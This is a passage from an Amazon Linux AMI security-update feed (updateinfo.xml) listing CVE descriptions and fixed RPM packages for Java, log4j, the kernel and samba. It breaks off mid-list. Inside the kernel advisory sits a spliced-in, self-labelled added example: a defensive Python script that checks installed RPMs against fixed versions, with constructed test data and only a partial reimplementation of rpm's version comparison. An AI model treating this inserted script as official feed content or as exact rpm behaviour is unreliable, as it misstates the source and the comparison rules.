Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35556:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12, 17; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).
CVE-2021-35550:
Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35550" title="" id="CVE-2021-35550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35556" title="" id="CVE-2021-35556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35559" title="" id="CVE-2021-35559" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35561" title="" id="CVE-2021-35561" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35564" title="" id="CVE-2021-35564" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35565" title="" id="CVE-2021-35565" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35567" title="" id="CVE-2021-35567" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35578" title="" id="CVE-2021-35578" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35586" title="" id="CVE-2021-35586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35588" title="" id="CVE-2021-35588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35603" title="" id="CVE-2021-35603" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.312.b07-0.65.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc-zip" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-zip-1.8.0.312.b07-0.65.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.65.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" 
arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.312.b07" release="0.65.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.312.b07-0.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1562</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1562: important priority package update for log4j</title><issued date="2022-01-18 20:15:00" /><updated date="2023-02-17 00:02:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-4104:
A flaw was found in the Java logging library Apache Log4j in version 1.x. This allows a remote attacker to execute code on the server if the deployed application is configured to use JMSAppender. This flaw has been filed for Log4j 1.x; the corresponding flaw information for Log4j 2.x is available at: https://access.redhat.com/security/cve/CVE-2021-44228
CVE-2019-17571:
A flaw was discovered in Log4j, where a vulnerable SocketServer class may lead to the deserialization of untrusted data. This flaw allows an attacker to remotely execute arbitrary code when combined with a deserialization gadget.
CVE-2017-5645:
It was found that when using remote logging with log4j socket server the log4j server would deserialize any log event received via TCP or UDP. An attacker could use this flaw to send a specially crafted log event that, during deserialization, would execute arbitrary code in the context of the logger application.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5645" title="" id="CVE-2017-5645" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17571" title="" id="CVE-2019-17571" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104" title="" id="CVE-2021-4104" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="log4j-manual" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-manual-1.2.17-16.12.amzn1.noarch.rpm</filename></package><package name="log4j" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-1.2.17-16.12.amzn1.noarch.rpm</filename></package><package name="log4j-javadoc" version="1.2.17" release="16.12.amzn1" epoch="0" arch="noarch"><filename>Packages/log4j-javadoc-1.2.17-16.12.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1563</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1563: important priority package update for kernel</title><issued date="2022-02-04 23:24:00" /><updated date="2025-01-30 04:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-0492:
The cgroup v1 release_agent is invoked via call_usermodehelper, which starts it with a full set of capabilities. Before this fix, a process that could write the release_agent file of a cgroup hierarchy could nominate a program that the kernel would then run with those capabilities; the fix requires capabilities when setting the release_agent.
CVE-2021-47506:
In the Linux kernel, the following vulnerability has been resolved:
nfsd: fix use-after-free due to delegation race
CVE-2021-47483:
In the Linux kernel, the following vulnerability has been resolved:
regmap: Fix possible double-free in regcache_rbtree_exit()
CVE-2021-4155:
A data leak flaw was found in the way XFS_IOC_ALLOCSP IOCTL in the XFS filesystem allowed for size increase of files with unaligned size. A local attacker could use this flaw to leak data on the XFS filesystem otherwise not accessible to them.
CVE-2021-4002:
A memory leak flaw was found in the Linux kernel's hugetlbfs handling. It is triggered when a user maps the same shmget() region twice at PUD-aligned addresses and faults in only some of the pages. A local user could use this flaw to gain unauthorized access to some data.
CVE-2021-3772:
A flaw was found in the Linux SCTP stack. A blind attacker may be able to kill an existing SCTP association through invalid chunks if the attacker knows the IP-addresses and port numbers being used and the attacker can send packets with spoofed IP addresses.
CVE-2021-28715:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. Some measures are taken to avoid piling up too much data, but a guest can bypass them: there is a timeout on how long the client side of an interface can stop consuming new packets before it is assumed to have stalled, but this timeout is rather long (60 seconds by default). Using a UDP connection on a fast interface can easily accumulate gigabytes of data in that time.
CVE-2021-28714:
Incoming data packets for a guest in the Linux kernel's netback driver are buffered until the guest is ready to process them. Some measures are taken to avoid piling up too much data, but a guest can bypass them: the timeout might never trigger if the guest manages to keep only one free slot in its RX queue ring page while the next packet requires more than one free slot, which may be the case when using GSO, XDP, or software hashing.
CVE-2021-28713:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28712:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-28711:
A denial of service flaw for virtual machine guests in the Linux kernel's Xen hypervisor subsystem was found in the way users call some interrupts with high frequency from one of the guests.
A local user could use this flaw to starve the resources resulting in a denial of service.
CVE-2021-20322:
A flaw in the Linux kernel's processing of received ICMP errors (ICMP Fragmentation Needed and ICMP Redirect) allows an off-path remote user to quickly scan open UDP ports and thereby effectively bypass UDP source port randomization. The highest threat from this vulnerability is to confidentiality and possibly integrity, because software that relies on UDP source port randomization is indirectly affected as well.
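<![CDATA[
What a practitioner usually wants from an entry like this kernel advisory is a per-host answer: is the installed build older than the fixed package listed in the pkglist? The script below is an added example, not part of the Amazon Linux feed or of yum. It parses updateinfo.xml entries (the embedded sample is a trimmed copy of the ALAS-2022-1563 and ALAS-2022-1565 entries from this feed), reads "rpm -qa" output in a pipe-separated query format, and compares epoch/version/release with a Python reimplementation of rpm's rpmvercmp() segment rules (tilde handled, caret not) rather than a call into librpm. The "installed" lines are constructed test input; the older kernel build they name is made up for the example.

```python
"""Match installed RPMs against the package lists of a yum updateinfo.xml.

Added example; not part of the Amazon Linux feed or of yum itself. The sample
XML is a trimmed copy of two entries from this feed (ALAS-2022-1563 and
ALAS-2022-1565); the "installed" lines are constructed test input, not real
package builds. rpm_vercmp() reimplements rpm's rpmvercmp() segment rules in
Python (tilde handled, caret not) instead of calling librpm.
"""
import xml.etree.ElementTree as ET

SAMPLE_UPDATEINFO = """<?xml version="1.0" ?><updates>
<update status="final" version="1.4" type="security"><id>ALAS-2022-1563</id><severity>important</severity>
<references><reference id="CVE-2022-0492" type="cve" title="" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0492" /></references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="kernel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package>
</collection></pkglist></update>
<update status="final" version="1.4" type="security"><id>ALAS-2022-1565</id><severity>medium</severity>
<references><reference id="CVE-2021-41617" type="cve" title="" href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41617" /></references>
<pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name>
<package name="openssh-server" version="7.4p1" release="22.77.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.77.amzn1.x86_64.rpm</filename></package>
</collection></pkglist></update></updates>"""

# Constructed output of: rpm -qa --qf '%{NAME}|%{EPOCH}|%{VERSION}|%{RELEASE}|%{ARCH}\n'
# Two kernels installed (a made-up older build and the fixed one); openssh-server already fixed.
SAMPLE_INSTALLED = [
    "kernel|(none)|4.14.256|129.472.amzn1|x86_64",
    "kernel|(none)|4.14.262|135.489.amzn1|x86_64",
    "openssh-server|(none)|7.4p1|22.77.amzn1|x86_64",
]


def _segment(s, i, pred):
    """Return the maximal run of characters starting at s[i] for which pred holds."""
    j = i
    while j < len(s) and pred(s[j]):
        j += 1
    return s[i:j]


def rpm_vercmp(a: str, b: str) -> int:
    """Compare two version (or release) strings with rpmvercmp() semantics; -1, 0 or 1.

    Strings are split into numeric and alphabetic segments: numeric segments compare
    as integers (leading zeros ignored), alphabetic ones lexically, and a numeric
    segment beats an alphabetic one. A tilde sorts before anything, including end of
    string ("1.0~rc1" < "1.0"). The caret rule of newer rpm releases is not implemented.
    """
    i = j = 0
    while i < len(a) or j < len(b):
        # Separators such as "." and "-" are skipped; only alphanumerics and "~" count.
        while i < len(a) and not (a[i].isalnum() or a[i] == "~"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] == "~"):
            j += 1
        ta = i < len(a) and a[i] == "~"
        tb = j < len(b) and b[j] == "~"
        if ta or tb:
            if ta and tb:
                i += 1
                j += 1
                continue
            return -1 if ta else 1
        if i >= len(a) or j >= len(b):
            break
        is_num = a[i].isdigit()
        pred = str.isdigit if is_num else str.isalpha
        sa, sb = _segment(a, i, pred), _segment(b, j, pred)
        i += len(sa)
        j += len(sb)
        if not sb:  # segment types differ: numeric is newer than alphabetic
            return 1 if is_num else -1
        if is_num:
            sa, sb = sa.lstrip("0"), sb.lstrip("0")
            if len(sa) != len(sb):
                return 1 if len(sa) > len(sb) else -1
        if sa != sb:
            return 1 if sa > sb else -1
    if i >= len(a) and j >= len(b):
        return 0
    return 1 if i < len(a) else -1  # whichever side has segments left is newer


def evr_cmp(evr_a, evr_b) -> int:
    """Compare (epoch, version, release) tuples; epoch decides first, then version, then release."""
    for x, y in zip(evr_a, evr_b):
        c = rpm_vercmp(x, y)
        if c:
            return c
    return 0


def parse_rpm_qa_line(line: str):
    """Parse one 'name|epoch|version|release|arch' line; rpm prints '(none)' for no epoch."""
    name, epoch, ver, rel, arch = line.strip().split("|")
    if epoch in ("", "(none)"):
        epoch = "0"
    return name, (epoch, ver, rel), arch


def parse_updateinfo(xml_text: str):
    """Yield one dict per update element: id, severity, CVE ids and fixed (name, EVR, arch) tuples."""
    for upd in ET.fromstring(xml_text).iter("update"):
        yield {
            "id": upd.findtext("id"),
            "severity": upd.findtext("severity"),
            "cves": [r.get("id") for r in upd.iter("reference") if r.get("type") == "cve"],
            "packages": [(p.get("name"), (p.get("epoch") or "0", p.get("version"), p.get("release")), p.get("arch"))
                         for p in upd.iter("package")],
        }


def affected_advisories(xml_text: str, installed_lines):
    """Return one finding per installed package instance that is older than an advisory's fixed EVR."""
    installed = {}
    for name, evr, arch in map(parse_rpm_qa_line, installed_lines):
        installed.setdefault((name, arch), []).append(evr)  # several kernels may coexist
    findings = []
    for adv in parse_updateinfo(xml_text):
        for name, fixed, arch in adv["packages"]:
            for have in installed.get((name, arch), []):
                if evr_cmp(have, fixed) < 0:
                    findings.append({"advisory": adv["id"], "severity": adv["severity"], "cves": adv["cves"],
                                     "package": f"{name}.{arch}", "installed": "%s:%s-%s" % have,
                                     "fixed": "%s:%s-%s" % fixed})
    return findings


if __name__ == "__main__":
    for f in affected_advisories(SAMPLE_UPDATEINFO, SAMPLE_INSTALLED):
        print(f"{f['advisory']} ({f['severity']}): {f['package']} {f['installed']} < {f['fixed']} {' '.join(f['cves'])}")
```

Run against a real host by replacing SAMPLE_UPDATEINFO with the contents of the cached updateinfo.xml and SAMPLE_INSTALLED with the output of the rpm query shown in the comment. Because every installed instance is checked, an old kernel left behind after an update is still reported even when the fixed kernel is also installed; whether that matters depends on which kernel is running, which the script does not check.
]]>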
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20322" title="" id="CVE-2021-20322" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28711" title="" id="CVE-2021-28711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28712" title="" id="CVE-2021-28712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28713" title="" id="CVE-2021-28713" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28714" title="" id="CVE-2021-28714" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28715" title="" id="CVE-2021-28715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3772" title="" id="CVE-2021-3772" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4002" title="" id="CVE-2021-4002" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4155" title="" id="CVE-2021-4155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47483" title="" id="CVE-2021-47483" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-47506" title="" id="CVE-2021-47506" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0492" title="" id="CVE-2022-0492" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" 
release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.262-135.489.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="perf" 
version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.262-135.489.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.262" release="135.489.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.262-135.489.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2022-1564</id><title>Amazon Linux AMI 2014.03 - ALAS-2022-1564: critical priority package update for samba</title><issued date="2022-02-10 21:59:00" /><updated date="2022-02-18 22:48:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-44142:
An out-of-bounds heap read/write vulnerability in the VFS module vfs_fruit allows code execution.
CVE-2021-20254:
A flaw was found in samba. The Samba smbd file server must map Windows group identities (SIDs) into unix group ids (gids). The code that performs this had a flaw that could allow it to read data beyond the end of the array in the case where a negative cache entry had been added to the mapping cache. This could cause the calling code to return those values into the process token that stores the group membership for a user. The highest threat from this vulnerability is to data confidentiality and integrity.
CVE-2020-25717:
A flaw was found in the way Samba maps domain users to local users. An authenticated attacker could use this flaw to cause possible privilege escalation.
CVE-2016-2124:
A flaw was found in the way samba implemented SMB1 authentication. An attacker could use this flaw to retrieve the plaintext password sent over the wire even if Kerberos authentication was required.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2124" title="" id="CVE-2016-2124" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25717" title="" id="CVE-2020-25717" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20254" title="" id="CVE-2021-20254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44142" title="" id="CVE-2021-44142" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.10.16" release="18.59.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.10.16-18.59.amzn1.noarch.rpm</filename></package><package name="libsmbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.10.16" release="18.59.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-test-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-python-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-test-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.10.16" release="18.59.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.10.16-18.59.amzn1.noarch.rpm</filename></package><package name="libwbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-krb5-printing" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-krb5-printing-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.10.16" release="18.59.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-client-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.10.16" release="18.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.10.16-18.59.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.10.16" release="18.59.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.10.16-18.59.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.10.16" release="18.59.amzn1" epoch="0" 